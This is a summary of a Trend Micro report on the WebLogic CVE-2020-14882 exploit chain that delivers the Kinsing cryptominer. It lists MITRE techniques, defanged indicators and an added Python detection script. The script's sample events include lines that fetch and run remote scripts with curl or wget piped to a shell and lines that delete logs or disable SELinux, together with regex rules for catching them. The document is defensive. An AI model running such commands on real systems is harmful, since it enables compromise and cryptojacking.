Trend Micro analyzed post-exploitation activity that abused the CVE-2020-14882 WebLogic vulnerability to deploy the Kinsing cryptocurrency-mining malware. The report details how Trend Micro Vision One and Cloud One Workload Security detected, blocked, and traced the attack chain from initial exploitation to cryptocurrency mining.
Key points
- Malicious actors weaponized CVE-2020-14882 WebLogic Remote Code Execution to gain footholds in target environments.
- The Kinsing miner was delivered through the WebLogic exploit via a downloaded shell script and a multi-step chain.
- The shell script attempted to disable security features (SELinux, watchdog timers, iptables) and cloud service agents as part of the payload.
- The exploit used a crafted request that caused the server to read wb.xml, which triggered the download of the shell script, followed by execution of wb.sh and the subsequent Kinsing deployment.
- Trend Micro Cloud One Workload Security and Vision One provided detection across IPS, antimalware, web reputation, and activity monitoring, and offered execution profiling and threat-hunting support.
- Observed cleanup and anti-forensic steps included removing logs, modifying /etc/crontab attributes, creating a cronjob, and disabling security features (e.g., AppArmor) prior to deploying Kinsing.
- Vision One’s execution profile and threat-hunting queries helped analysts trace the attack steps across endpoints, servers, and cloud workloads.
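As an added illustration (not code from the Trend Micro report), the following Python sketch turns the attack stages listed above into simple detection rules and runs them over a constructed, simplified endpoint-activity feed. The event format, the rule names, the 203.0.113.10 address, and the specific commands used for the attribute change and SELinux step (chattr, setenforce) are assumptions, not values taken from the report.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not from the report). Each line has the
# assumed shape "<kind> <parent> <command>", where kind is "proc" for a
# process launch or "cron" for a crontab entry. 203.0.113.10 is a
# documentation address standing in for the real download host.
SAMPLE_EVENTS = [
    "proc java /bin/bash -c 'curl -s hxxp://203.0.113.10/wb.sh | bash'",
    "proc bash setenforce 0",                      # assumed SELinux disable
    "proc bash rm -f /var/log/syslog",             # log removal
    "proc bash chattr -i /etc/crontab",            # assumed attribute change
    "cron root */1 * * * * wget -q -O- hxxp://203.0.113.10/wb.sh | sh",
    "proc java /usr/bin/java -jar app.jar",        # benign: no shell spawned
    "cron root 0 3 * * * /usr/local/bin/backup.sh",  # benign cron entry
]

# One rule per stage the report describes; rule names are our own.
RULES = {
    "java_spawns_shell":        r"^proc java \S*\b(ba)?sh\b",
    "remote_script_fetch":      r"^(proc|cron) .*\b(curl|wget)\b.*\|\s*(ba)?sh\b",
    "selinux_or_apparmor_off":  r"^proc \S+ .*\b(setenforce|apparmor)\b",
    "syslog_removal":           r"^proc \S+ rm\b.*/var/log/syslog\b",
    "crontab_attribute_change": r"^proc \S+ chattr\b.*/etc/crontab\b",
}


def scan_events(lines):
    """Return {rule_name: [matching event lines]} for the given feed."""
    hits = defaultdict(list)
    for line in lines:
        for name, pattern in RULES.items():
            if re.search(pattern, line):
                hits[name].append(line)
    return dict(hits)


def chain_stages_seen(hits):
    """Number of distinct chain stages observed. Several stages together are
    a far stronger signal than any single one, since a log deletion or a
    firewall change can each be routine administration in isolation."""
    return len(hits)


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for rule, events in found.items():
        print(f"[{rule}] {len(events)} event(s)")
    print("chain stages seen:", chain_stages_seen(found))
```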
MITRE Techniques
- [T1190] Exploit Public-Facing Application – ‘remote unauthenticated attacker via sending a crafted HTTP request to the victim server resulting in RCE.’
- [T1059.004] Command and Scripting Interpreter: Unix Shell – ‘downloaded a shell script with the following contents’ and ‘the Java process attempting to open a bash shell.’
- [T1496] Resource Hijacking – ‘to deliver cryptocurrency-mining malware.’
- [T1070.002] Indicator Removal on Host: Clear Linux or Mac System Logs – ‘remove the /var/log/syslog file.’
- [T1222.002] File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification – ‘attribute modification of “/etc/crontab”.’
- [T1562.004] Impair Defenses: Disable or Modify System Firewall – ‘disable Security-Enhanced Linux (SELinux), watchdog timers, and iptables, and disabling cloud service provider’s agents.’
- [T1070.004] Indicator Removal on Host: File Deletion – ‘delete the /var/log/syslog file’ (log removal).
- [T1053.003] Scheduled Task/Job: Cron – ‘cronjob to download the wb.sh script.’
- [T1562.008] Impair Defenses: Disable Cloud Logs – ‘disable cloud service provider’s agents.’
Indicators of Compromise
- [URLs] Context – hxxp://91[.]241[.]19[.]134/wb.sh, hxxp://185[.]14[.]30[.]35/kinsing, hxxp://185[.]14[.]30[.]35/wb.sh, hxxp://195[.]2[.]79[.]26/kinsing
- [SHA-256] Context – 020c14b7bf5ff410ea12226f9ca070540bd46eff80cf20416871143464f7d546, 5D2530B809FD069F97B30A5938D471DD2145341B5793A70656AAD6045445CF6D
- [IP] addresses – 212.22.77.79, 185.234.247.8, 185.154.53.140